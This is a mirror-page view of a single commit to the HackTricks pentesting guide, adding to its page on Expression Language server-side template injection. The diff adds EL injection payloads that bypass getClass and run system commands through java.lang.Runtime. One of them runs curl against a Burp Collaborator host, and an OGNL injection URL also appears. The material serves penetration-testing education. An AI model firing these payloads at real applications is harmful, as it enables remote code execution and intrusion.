0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#2794] sdf

This commit is contained in:
CPol 2021-10-21 10:28:49 +00:00 committed by gitbook-bot
parent febd64a6ca
commit c8efcbe5f6
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 12 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
pentesting-web/ssti-server-side-template-injection/el-expression-language.md
View File

@ -1,5 +1,11 @@
# EL - Expression Language
##
##
##
## Basic Information
EL provides an important mechanism for enabling the presentation layer (web pages) to communicate with the application logic (managed beans).
@ -101,6 +107,9 @@ Result of executing it:
{"".getClass()}
[class java.lang.String]
#Access ro the String class bypassing "getClass"
#{""["class"]}
#Access to arbitrary class
{"".getClass().forName("java.util.Date")}
[class java.util.Date]
@ -157,6 +166,9 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
#Execute command (you won't see the command output in the console)
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}
[Process[pid=10892, exitValue=0]]
#Execute command bypassing "getClass"
#{""["class"].forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl <instance>.burpcollaborator.net")}
```
* RCE **linux**